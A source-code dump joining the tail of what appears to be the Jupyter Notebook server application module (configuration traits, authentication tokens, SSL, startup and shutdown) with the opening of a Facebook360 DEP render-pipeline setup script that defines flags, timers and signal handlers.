return "%H:%M:%S"
@default('log_format')
def _default_log_format(self):
"""override default log format to include time"""
return u"%(color)s[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s]%(end_color)s %(message)s"
ignore_minified_js = Bool(False,
config=True,
help='Deprecated: Use minified JS file or not, mainly used during dev to avoid JS recompilation',
)
# file to be opened in the notebook server
file_to_run = Unicode('', config=True)
# Network related information
allow_origin = Unicode('', config=True,
help="""Set the Access-Control-Allow-Origin header
Use '*' to allow any origin to access your server.
Takes precedence over allow_origin_pat.
"""
)
allow_origin_pat = Unicode('', config=True,
help="""Use a regular expression for the Access-Control-Allow-Origin header
Requests from an origin matching the expression will get replies with:
Access-Control-Allow-Origin: origin
where `origin` is the origin of the request.
Ignored if allow_origin is set.
"""
)
allow_credentials = Bool(False, config=True,
help="Set the Access-Control-Allow-Credentials: true header"
)
allow_root = Bool(False, config=True,
help="Whether to allow the user to run the notebook as root."
)
default_url = Unicode('/tree', config=True,
help="The default URL to redirect to from `/`"
)
ip = Unicode('localhost', config=True,
help="The IP address the notebook server will listen on."
)
@default('ip')
def _default_ip(self):
"""Return localhost if available, 127.0.0.1 otherwise.
On some (horribly broken) systems, localhost cannot be bound.
"""
s = socket.socket()
try:
s.bind(('localhost', 0))
except socket.error as e:
self.log.warning("Cannot bind to localhost, using 127.0.0.1 as default ip\n%s", e)
return '127.0.0.1'
else:
s.close()
return 'localhost'
@validate('ip')
def _validate_ip(self, proposal):
value = proposal['value']
if value == u'*':
value = u''
return value
port = Integer(8888, config=True,
help="The port the notebook server will listen on."
)
port_retries = Integer(50, config=True,
help="The number of additional ports to try if the specified port is not available."
)
certfile = Unicode(u'', config=True,
help="""The full path to an SSL/TLS certificate file."""
)
keyfile = Unicode(u'', config=True,
help="""The full path to a private key file for usage with SSL/TLS."""
)
client_ca = Unicode(u'', config=True,
help="""The full path to a certificate authority certificate for SSL/TLS client authentication."""
)
cookie_secret_file = Unicode(config=True,
help="""The file where the cookie secret is stored."""
)
@default('cookie_secret_file')
def _default_cookie_secret_file(self):
return os.path.join(self.runtime_dir, 'notebook_cookie_secret')
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
@default('cookie_secret')
def _default_cookie_secret(self):
if os.path.exists(self.cookie_secret_file):
with io.open(self.cookie_secret_file, 'rb') as f:
return f.read()
else:
secret = encodebytes(os.urandom(1024))
self._write_cookie_secret_file(secret)
return secret
def _write_cookie_secret_file(self, secret):
"""write my secret to my secret_file"""
self.log.info("Writing notebook server cookie secret to %s", self.cookie_secret_file)
with io.open(self.cookie_secret_file, 'wb') as f:
f.write(secret)
try:
os.chmod(self.cookie_secret_file, 0o600)
except OSError:
self.log.warning(
"Could not set permissions on %s",
self.cookie_secret_file
)
token = Unicode('<generated>',
help="""Token used for authenticating first-time connections to the server.
When no password is enabled,
the default is to generate a new, random token.
Setting to an empty string disables authentication altogether, which is NOT RECOMMENDED.
"""
).tag(config=True)
one_time_token = Unicode(
help="""One-time token used for opening a browser.
Once used, this token cannot be used again.
"""
)
_token_generated = True
@default('token')
def _token_default(self):
if self.password:
# no token if password is enabled
self._token_generated = False
return u''
else:
self._token_generated = True
return binascii.hexlify(os.urandom(24)).decode('ascii')
@observe('token')
def _token_changed(self, change):
self._token_generated = False
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from notebook.auth import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
password_required = Bool(False, config=True,
help="""Forces users to use a password for the Notebook server.
This is useful in a multi-user environment, for instance when
everybody in the LAN can access each other's machine through ssh.
In such a case, serving the notebook server on localhost is not secure
since any user can connect to the notebook server via ssh.
"""
)
disable_check_xsrf = Bool(False, config=True,
help="""Disable cross-site-request-forgery protection
Jupyter notebook 4.3.1 introduces protection from cross-site request forgeries,
requiring API requests to either:
- originate from pages served by this server (validated with XSRF cookie and token), or
- authenticate with a token
Some anonymous compute resources still desire the ability to run code,
completely without authentication.
These services can disable all authentication and security checks,
with the full knowledge of what that implies.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webapp_settings = Dict(config=True,
help="DEPRECATED, use tornado_settings"
)
@observe('webapp_settings')
def _update_webapp_settings(self, change):
self.log.warning("\n webapp_settings is deprecated, use tornado_settings.\n")
self.tornado_settings = change['new']
tornado_settings = Dict(config=True,
help="Supply overrides for the tornado.web.Application that the "
"Jupyter notebook uses.")
terminado_settings = Dict(config=True,
help='Supply overrides for terminado. Currently only supports "shell_command".')
cookie_options = Dict(config=True,
help="Extra keyword arguments to pass to `set_secure_cookie`."
" See tornado's set_secure_cookie docs for details."
)
ssl_options = Dict(config=True,
help="""Supply SSL options for the tornado HTTPServer.
See the tornado docs for details.""")
jinja_environment_options = Dict(config=True,
help="Supply extra arguments that will be passed to Jinja environment.")
jinja_template_vars = Dict(
config=True,
help="Extra variables to supply to jinja templates when rendering.",
)
enable_mathjax = Bool(True, config=True,
help="""Whether to enable MathJax for typesetting math/TeX
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
@observe('enable_mathjax')
def _update_enable_mathjax(self, change):
"""set mathjax url to empty if mathjax is disabled"""
if not change['new']:
self.mathjax_url = u''
base_url = Unicode('/', config=True,
help='''The base URL for the notebook server.
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
@validate('base_url')
def _update_base_url(self, proposal):
value = proposal['value']
if not value.startswith('/'):
value = '/' + value
elif not value.endswith('/'):
value = value + '/'
return value
base_project_url = Unicode('/', config=True, help="""DEPRECATED use base_url""")
@observe('base_project_url')
def _update_base_project_url(self, change):
self.log.warning("base_project_url is deprecated, use base_url")
self.base_url = change['new']
extra_static_paths = List(Unicode(), config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the notebook server machine,
or overriding individual files in the IPython"""
)
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
static_custom_path = List(Unicode(),
help="""Path to search for custom.js, css"""
)
@default('static_custom_path')
def _default_static_custom_path(self):
return [
os.path.join(d, 'custom') for d in (
self.config_dir,
DEFAULT_STATIC_FILES_PATH)
]
extra_template_paths = List(Unicode(), config=True,
help="""Extra paths to search for serving jinja templates.
Can be used to override templates from notebook.templates."""
)
@property
def template_file_path(self):
"""return extra paths + the default locations"""
return self.extra_template_paths + DEFAULT_TEMPLATE_PATH_LIST
extra_nbextensions_path = List(Unicode(), config=True,
help="""extra paths to look for Javascript notebook extensions"""
)
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = self.extra_nbextensions_path + jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
websocket_url = Unicode("", config=True,
help="""The base URL for websockets,
if it differs from the HTTP server (hint: it almost certainly doesn't).
Should be in the form of an HTTP origin: ws[s]://hostname[:port]
"""
)
mathjax_url = Unicode("", config=True,
help="""A custom url for MathJax.js.
Should be in the form of a case-sensitive url to MathJax,
for example: /static/components/MathJax/MathJax.js
"""
)
@default('mathjax_url')
def _default_mathjax_url(self):
if not self.enable_mathjax:
return u''
static_url_prefix = self.tornado_settings.get("static_url_prefix", "static")
return url_path_join(static_url_prefix, 'components', 'MathJax', 'MathJax.js')
@observe('mathjax_url')
def _update_mathjax_url(self, change):
new = change['new']
if new and not self.enable_mathjax:
# enable_mathjax=False overrides mathjax_url
self.mathjax_url = u''
else:
self.log.info("Using MathJax: %s", new)
mathjax_config = Unicode("TeX-AMS-MML_HTMLorMML-full,Safe", config=True,
help="""The MathJax.js configuration file that is to be used."""
)
@observe('mathjax_config')
def _update_mathjax_config(self, change):
self.log.info("Using MathJax configuration file: %s", change['new'])
contents_manager_class = Type(
default_value=LargeFileManager,
klass=ContentsManager,
config=True,
help='The notebook manager class to use.'
)
kernel_manager_class = Type(
default_value=MappingKernelManager,
config=True,
help='The kernel manager class to use.'
)
session_manager_class = Type(
default_value=SessionManager,
config=True,
help='The session manager class to use.'
)
config_manager_class = Type(
default_value=ConfigManager,
config = True,
help='The config manager class to use'
)
kernel_spec_manager = Instance(KernelSpecManager, allow_none=True)
kernel_spec_manager_class = Type(
default_value=KernelSpecManager,
config=True,
help="""
The kernel spec manager class to use. Should be a subclass
of `jupyter_client.kernelspec.KernelSpecManager`.
The Api of KernelSpecManager is provisional and might change
without warning between this version of Jupyter and the next stable one.
"""
)
login_handler_class = Type(
default_value=LoginHandler,
klass=web.RequestHandler,
config=True,
help='The login handler class to use.',
)
logout_handler_class = Type(
default_value=LogoutHandler,
klass=web.RequestHandler,
config=True,
help='The logout handler class to use.',
)
trust_xheaders = Bool(False, config=True,
help=("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL")
)
info_file = Unicode()
@default('info_file')
def _default_info_file(self):
info_file = "nbserver-%s.json" % os.getpid()
return os.path.join(self.runtime_dir, info_file)
pylab = Unicode('disabled', config=True,
help="""
DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
"""
)
@observe('pylab')
def _update_pylab(self, change):
"""when --pylab is specified, display a warning and exit"""
if change['new'] != 'warn':
backend = ' %s' % change['new']
else:
backend = ''
self.log.error("Support for specifying --pylab on the command line has been removed.")
self.log.error(
"Please use `%pylab{0}` or `%matplotlib{0}` in the notebook itself.".format(backend)
)
self.exit(1)
notebook_dir = Unicode(config=True,
help="The directory to use for notebooks and kernels."
)
@default('notebook_dir')
def _default_notebook_dir(self):
if self.file_to_run:
return os.path.dirname(os.path.abspath(self.file_to_run))
else:
return py3compat.getcwd()
@validate('notebook_dir')
def _notebook_dir_validate(self, proposal):
value = proposal['value']
# Strip any trailing slashes
# *except* if it's root
_, path = os.path.splitdrive(value)
if path == os.sep:
return value
value = value.rstrip(os.sep)
if not os.path.isabs(value):
# If we receive a non-absolute path, make it absolute.
value = os.path.abspath(value)
if not os.path.isdir(value):
raise TraitError("No such notebook dir: %r" % value)
return value
@observe('notebook_dir')
def _update_notebook_dir(self, change):
"""Do a bit of validation of the notebook dir."""
# setting App.notebook_dir implies setting notebook and kernel dirs as well
new = change['new']
self.config.FileContentsManager.root_dir = new
self.config.MappingKernelManager.root_dir = new
# TODO: Remove me in notebook 5.0
server_extensions = List(Unicode(), config=True,
help=("DEPRECATED use the nbserver_extensions dict instead")
)
@observe('server_extensions')
def _update_server_extensions(self, change):
self.log.warning("server_extensions is deprecated, use nbserver_extensions")
self.server_extensions = change['new']
nbserver_extensions = Dict({}, config=True,
help=("Dict of Python modules to load as notebook server extensions."
"Entry values can be used to enable and disable the loading of"
"the extensions. The extensions will be loaded in alphabetical "
"order.")
)
reraise_server_extension_failures = Bool(
False,
config=True,
help="Reraise exceptions encountered loading server extensions?",
)
iopub_msg_rate_limit = Float(1000, config=True, help="""(msgs/sec)
Maximum rate at which messages can be sent on iopub before they are
limited.""")
iopub_data_rate_limit = Float(1000000, config=True, help="""(bytes/sec)
Maximum rate at which messages can be sent on iopub before they are
limited.""")
rate_limit_window = Float(3, config=True, help="""(sec) Time window used to
check the message and data rate limits.""")
def parse_command_line(self, argv=None):
super(NotebookApp, self).parse_command_line(argv)
if self.extra_args:
arg0 = self.extra_args[0]
f = os.path.abspath(arg0)
self.argv.remove(arg0)
if not os.path.exists(f):
self.log.critical("No such file or directory: %s", f)
self.exit(1)
# Use config here, to ensure that it takes higher priority than
# anything that comes from the config dirs.
c = Config()
if os.path.isdir(f):
c.NotebookApp.notebook_dir = f
elif os.path.isfile(f):
c.NotebookApp.file_to_run = f
self.update_config(c)
def init_configurables(self):
self.kernel_spec_manager = self.kernel_spec_manager_class(
parent=self,
)
self.kernel_manager = self.kernel_manager_class(
parent=self,
log=self.log,
connection_dir=self.runtime_dir,
kernel_spec_manager=self.kernel_spec_manager,
)
self.contents_manager = self.contents_manager_class(
parent=self,
log=self.log,
)
self.session_manager = self.session_manager_class(
parent=self,
log=self.log,
kernel_manager=self.kernel_manager,
contents_manager=self.contents_manager,
)
self.config_manager = self.config_manager_class(
parent=self,
log=self.log,
)
def init_logging(self):
# This prevents double log messages because tornado uses a root logger that
# self.log is a child of. The logging module dispatches log messages to a log
# and all of its ancestors until propagate is set to False.
self.log.propagate = False
for log in app_log, access_log, gen_log:
# consistent log output name (NotebookApp instead of tornado.access, etc.)
log.name = self.log.name
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger('tornado')
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.tornado_settings['allow_origin'] = self.allow_origin
if self.allow_origin_pat:
self.tornado_settings['allow_origin_pat'] = re.compile(self.allow_origin_pat)
self.tornado_settings['allow_credentials'] = self.allow_credentials
self.tornado_settings['cookie_options'] = self.cookie_options
self.tornado_settings['token'] = self.token
if (self.open_browser or self.file_to_run) and not self.password:
self.one_time_token = binascii.hexlify(os.urandom(24)).decode('ascii')
self.tornado_settings['one_time_token'] = self.one_time_token
# ensure default_url starts with base_url
if not self.default_url.startswith(self.base_url):
self.default_url = url_path_join(self.base_url, self.default_url)
if self.password_required and (not self.password):
self.log.critical("Notebook servers are configured to only be run with a password.")
self.log.critical("Hint: run the following command to set a password")
self.log.critical("\t$ python -m notebook.auth password")
sys.exit(1)
self.web_app = NotebookWebApplication(
self, self.kernel_manager, self.contents_manager,
self.session_manager, self.kernel_spec_manager,
self.config_manager,
self.log, self.base_url, self.default_url, self.tornado_settings,
self.jinja_environment_options
)
ssl_options = self.ssl_options
if self.certfile:
ssl_options['certfile'] = self.certfile
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
if self.client_ca:
ssl_options['ca_certs'] = self.client_ca
if not ssl_options:
# None indicates no SSL config
ssl_options = None
else:
# SSL may be missing, so only import it if it's to be used
import ssl
# Disable SSLv3 by default, since its use is discouraged.
ssl_options.setdefault('ssl_version', ssl.PROTOCOL_TLSv1)
if ssl_options.get('ca_certs', False):
ssl_options.setdefault('cert_reqs', ssl.CERT_REQUIRED)
self.login_handler_class.validate_security(self, ssl_options=ssl_options)
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders)
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info('The port %i is already in use, trying another port.' % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning("Permission to listen on port %i denied" % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical('ERROR: the notebook server could not be started because '
'no available port could be found.')
self.exit(1)
@property
def display_url(self):
ip = self.ip if self.ip else '[all ip addresses on your system]'
url = self._url(ip)
if self.token:
# Don't log full token if it came from config
token = self.token if self._token_generated else '...'
url = url_concat(url, {'token': token})
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
def init_terminals(self):
try:
from .terminal import initialize
initialize(self.web_app, self.notebook_dir, self.connection_url, self.terminado_settings)
self.web_app.settings['terminals_available'] = True
except ImportError as e:
log = self.log.debug if sys.platform == 'win32' else self.log.warning
log("Terminals not available (error was %s)", e)
def init_signal(self):
if not sys.platform.startswith('win') and sys.stdin.isatty():
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info('interrupted')
print(self.notebook_info())
sys.stdout.write("Shutdown this notebook server (y/[n])? ")
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith('y') and 'n' not in line.lower():
self.log.critical("Shutdown confirmed")
ioloop.IOLoop.current().stop()
return
else:
print("No answer for 5s:", end=' ')
print("resuming operation...")
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
ioloop.IOLoop.current().add_callback(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical("received signal %s, stopping", sig)
ioloop.IOLoop.current().stop()
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
# TODO: this should still check, but now we use bower, not git submodule
pass
def init_server_extensions(self):
"""Load any extensions specified by config.
Import the module, then call the load_jupyter_server_extension function,
if one exists.
The extension API is experimental, and may change in future releases.
"""
# TODO: Remove me in notebook 5.0
for modulename in self.server_extensions:
# Don't override disable state of the extension if it already exist
# in the new traitlet
if not modulename in self.nbserver_extensions:
self.nbserver_extensions[modulename] = True
# Load server extensions with ConfigManager.
# This enables merging on keys, which we want for extension enabling.
# Regular config loading only merges at the class level,
# so each level (user > env > system) clobbers the previous.
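# Example of the merged shape (illustration only, "myext" is a hypothetical
# module name): a jupyter_notebook_config.json containing
# {"NotebookApp": {"nbserver_extensions": {"myext": true}}} enables "myext"
# at whichever config level the file lives in.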
config_path = jupyter_config_path()
if self.config_dir not in config_path:
# add self.config_dir to the front, if set manually
config_path.insert(0, self.config_dir)
manager = ConfigManager(read_config_path=config_path)
section = manager.get(self.config_file_name)
extensions = section.get('NotebookApp', {}).get('nbserver_extensions', {})
for modulename, enabled in self.nbserver_extensions.items():
if modulename not in extensions:
# not present in `extensions` means it comes from Python config,
# so we need to add it.
# Otherwise, trust ConfigManager to have loaded it.
extensions[modulename] = enabled
for modulename, enabled in sorted(extensions.items()):
if enabled:
try:
mod = importlib.import_module(modulename)
func = getattr(mod, 'load_jupyter_server_extension', None)
if func is not None:
func(self)
except Exception:
if self.reraise_server_extension_failures:
raise
self.log.warning("Error loading server extension %s", modulename,
exc_info=True)
def init_mime_overrides(self):
# On some Windows machines, an application has registered an incorrect
# mimetype for CSS in the registry. Tornado uses this when serving
# .css files, causing browsers to reject the stylesheet. We know the
# mimetype always needs to be text/css, so we override it here.
mimetypes.add_type('text/css', '.css')
@catch_config_error
def initialize(self, argv=None):
super(NotebookApp, self).initialize(argv)
self.init_logging()
if self._dispatching:
return
self.init_configurables()
self.init_components()
self.init_webapp()
self.init_terminals()
self.init_signal()
self.init_server_extensions()
self.init_mime_overrides()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
self.log.info('Shutting down kernels')
self.kernel_manager.shutdown_all()
def notebook_info(self):
"Return the current working directory and the server url information"
info = self.contents_manager.info_string() + "\n"
info += "%d active kernels \n" % len(self.kernel_manager._kernels)
return info + "The Jupyter Notebook is running at: %s" % self.display_url
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'secure': bool(self.certfile),
'base_url': self.base_url,
'token': self.token,
'notebook_dir': os.path.abspath(self.notebook_dir),
'password': bool(self.password),
'pid': os.getpid(),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2, sort_keys=True)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def start(self):
""" Start the Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
if not self.allow_root:
# check if we are running as root, and abort if it's not allowed
try:
uid = os.geteuid()
except AttributeError:
uid = -1 # anything nonzero here, since we can't check UID assume non-root
if uid == 0:
self.log.critical("Running as root is not recommended. Use --allow-root to bypass.")
self.exit(1)
super(NotebookApp, self).start()
info = self.log.info
for line in self.notebook_info().split("\n"):
info(line)
info("Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).")
if 'dev' in notebook.__version__:
info("Welcome to Project Jupyter! Explore the various tools available"
" and their corresponding documentation. If you are interested"
" in contributing to the platform, please visit the community"
"resources section at http://jupyter.org/community.html.")
self.write_server_info_file()
if self.open_browser or self.file_to_run:
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning('No web browser found: %s.' % e)
browser = None
if self.file_to_run:
if not os.path.exists(self.file_to_run):
self.log.critical("%s does not exist" % self.file_to_run)
self.exit(1)
relpath = os.path.relpath(self.file_to_run, self.notebook_dir)
uri = url_escape(url_path_join('notebooks', *relpath.split(os.sep)))
else:
# default_url contains base_url, but so does connection_url
uri = self.default_url[len(self.base_url):]
if self.one_time_token:
uri = url_concat(uri, {'token': self.one_time_token})
if browser:
b = lambda : browser.open(url_path_join(self.connection_url, uri),
new=2)
threading.Thread(target=b).start()
if self.token and self._token_generated:
# log full URL with generated token, so there's a copy/pasteable link
# with auth info.
self.log.critical('\n'.join([
'\n',
'Copy/paste this URL into your browser when you connect for the first time,',
'to login with a token:',
' %s' % url_concat(self.connection_url, {'token': self.token}),
]))
self.io_loop = ioloop.IOLoop.current()
if sys.platform.startswith('win'):
# add no-op to wake every 5s
# to handle signals that may be ignored by the inner loop
pc = ioloop.PeriodicCallback(lambda : None, 5000)
pc.start()
try:
self.io_loop.start()
except KeyboardInterrupt:
info("Interrupted...")
finally:
self.remove_server_info_file()
self.cleanup_kernels()
def stop(self):
def _stop():
self.http_server.stop()
self.io_loop.stop()
self.io_loop.add_callback(_stop)
def list_running_servers(runtime_dir=None):
"""Iterate over the server info files of running notebook servers.
Given a runtime directory, find nbserver-* files in the security directory,
and yield dicts of their information, each one pertaining to
a currently running notebook server instance.
"""
if runtime_dir is None:
runtime_dir = jupyter_runtime_dir()
# The runtime dir might not exist
if not os.path.isdir(runtime_dir):
return
for file in os.listdir(runtime_dir):
if file.startswith('nbserver-'):
with io.open(os.path.join(runtime_dir, file), encoding='utf-8') as f:
info = json.load(f)
# Simple check whether that process is really still running
# Also remove leftover files from IPython 2.x without a pid field
if ('pid' in info) and check_pid(info['pid']):
yield info
else:
# If the process has died, try to delete its info file
try:
os.unlink(os.path.join(runtime_dir, file))
except OSError:
pass # TODO: This should warn or log or something
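# Illustrative usage sketch (commented out; shown only as an example of consuming
# the info dicts yielded above, not as part of the module's API surface):
#
#     for server in list_running_servers():
#         print(server['url'], server['notebook_dir'])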
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
main = launch_new_instance = NotebookApp.launch_instance
|
setup.py
|
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
"""Miscellaneous I/O utility functions for setting up the render pipeline.
Abstracts over the setup that has to be done for various configurations of the
farm, namely a single node, a LAN farm, or an AWS farm. It additionally sets up
the appropriate flags to execute render.py. setup.py cannot be run standalone.
Attributes:
    bin_to_flags (dict[str, list[dict[str, _]]]): Map from binary name to corresponding flags.
FLAGS (absl.flags._flagvalues.FlagValues): Globally defined flags for render.py. Note that,
unlike all other apps, the FLAGS here do not directly relate to setup.py.
"""
import datetime
import json
import multiprocessing as mp
import os
import re
import signal
import sys
import traceback
from pathlib import Path
from shutil import which
from subprocess import Popen
from threading import Timer
from absl import flags, logging
dir_scripts = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
dir_root = os.path.dirname(dir_scripts)
sys.path.append(dir_root)
sys.path.append(os.path.join(dir_scripts, "util"))
import config
from network import Address, NetcatClient, get_os_type
from scripts.util.system_util import get_flags, image_type_paths, OSType, run_command
FLAGS = flags.FLAGS
flag_names = set()
child_pids = []
facebook360_dep_root = str(Path(os.path.abspath(__file__)).parents[2])
source_root = os.path.join(facebook360_dep_root, "source")
depth_est_src = os.path.join(source_root, "depth_estimation")
bin_to_flags = {
"TemporalBilateralFilter": get_flags(
os.path.join(depth_est_src, "TemporalBilateralFilter.cpp")
),
"ConvertToBinary": get_flags(
os.path.join(source_root, "mesh_stream", "ConvertToBinary.cpp")
),
"DerpCLI": get_flags(os.path.join(depth_est_src, "DerpCLI.cpp")),
"GenerateForegroundMasks": get_flags(
os.path.join(source_root, "render", "GenerateForegroundMasks.cpp")
),
"LayerDisparities": get_flags(os.path.join(depth_est_src, "LayerDisparities.cpp")),
"SimpleMeshRenderer": get_flags(
os.path.join(source_root, "render", "SimpleMeshRenderer.cpp")
),
"UpsampleDisparity": get_flags(
os.path.join(depth_est_src, "UpsampleDisparity.cpp")
),
}
class RepeatedTimer(object):
"""Executes a provided function at periodic intervals.
Attributes:
*args: Variable length argument list for the function to be repeatedly executed.
function (func): Arbitrary function to be repeatedly run.
interval (int): Number of seconds between consecutive runs of the function.
is_running (bool): Whether or not the function is currently running.
**kwargs: Arbitrary keyword arguments for the function to be repeatedly executed.
"""
def __init__(self, interval, function, *args, **kwargs):
"""Sets up a function to be repeatedly run in the background at fixed intervals.
Args:
            interval (int): Number of seconds between consecutive runs of the function.
function (func): Arbitrary function to be repeatedly run.
*args: Variable length argument list.
**kwargs: Arbitrary keyword arguments.
"""
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.start()
def _run(self):
"""Runs the function asynchronously."""
self.is_running = False
self.start()
self.function(*self.args, **self.kwargs)
def start(self):
"""Starts the repeated execution asynchronously."""
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def stop(self):
"""Stops the repeated execution."""
self._timer.cancel()
self.is_running = False
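# Illustrative usage sketch (commented out; `heartbeat` is a hypothetical callable,
# not defined in this module):
#
#     timer = RepeatedTimer(5, heartbeat, "still rendering")  # calls heartbeat("still rendering") every ~5s
#     ...  # do long-running work
#     timer.stop()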
def init_facebook360_dep(gflags):
"""Sets up the environment with expected values and handlers.
Args:
gflags (absl.flags._flagvalues.FlagValues): Globally defined flags.
"""
setup_termination_handlers()
set_glog_env(gflags)
setup_logging_handler(gflags.log_dir)
# Glog wrapper doesn't see GLOG environment variables, so we need to set them manually
# GLOG environment variables override local flags
def set_glog_env(gflags):
"""Sets up GLOG environment variables.
Args:
gflags (absl.flags._flagvalues.FlagValues): Globally defined flags.
"""
gflags.alsologtostderr = "1"
gflags.stderrthreshold = "0"
output_address = Address(FLAGS.output_root)
if output_address.protocol != "s3":
gflags.log_dir = os.path.join(FLAGS.output_root, "logs")
# Create logging directory and setup logging handler
def setup_logging_handler(log_dir):
"""Sets up logging.
Args:
log_dir (str): Path to directory where logs should be saved.
"""
if log_dir:
os.makedirs(log_dir, exist_ok=True)
program_name = os.path.splitext(os.path.basename(sys.argv[0]))[0]
logging.get_absl_handler().use_absl_log_file(program_name, log_dir)
def terminate_handler():
"""Cleans workers before terminating the program."""
cleanup_workers()
logging.error("".join(traceback.format_stack()))
sys.exit(0)
def sigterm_handler(signal, frame):
"""Handler for any catchable signal that terminates the program.
Args:
signal (signal.signal): Type of signal.
frame (frame): Stack frame.
"""
logging.error(f"Signal handler called with signal {signal}")
terminate_handler()
def setup_termination_handlers(sigterm_handler=sigterm_handler):
"""Sets up a handler for all termination signals.
Args:
sigterm_handler (func: (signal.signal, frame) -> void, optional): Function for handling
termination signals.
"""
[
signal.signal(s, sigterm_handler)
for s in [
signal.SIGHUP, # terminate process: terminal line hangup
signal.SIGINT, # terminate process: interrupt program
signal.SIGQUIT, # create core image: quit program
signal.SIGILL, # create core image: illegal instruction
signal.SIGTRAP, # create core image: trace trap
signal.SIGFPE, # create core image: floating-point exception
signal.SIGBUS, # create core image: bus error
signal.SIGSEGV, # create core image: segmentation violation
signal.SIGSYS, # create core image: non-existent system call invoked
signal.SIGPIPE, # terminate process: write on a pipe with no reader
signal.SIGTERM, # terminate process: software termination signal
]
]
def define_flags():
"""Defines abseil flags for render."""
for bin in bin_to_flags:
for flag in bin_to_flags[bin]:
if flag["name"] in flag_names:
continue
cmd = f"flags.DEFINE_{flag['type']}('{flag['name']}', {flag['default']}, '{flag['descr']}')"
exec(cmd)
flag_names.add(flag["name"])
flags.DEFINE_integer("chunk_size", 1, "chunk size of work distribution to workers")
flags.DEFINE_string("cloud", "", "cloud compute service (currently supports: aws)")
flags.DEFINE_string("color_type", "color", "type of color to render")
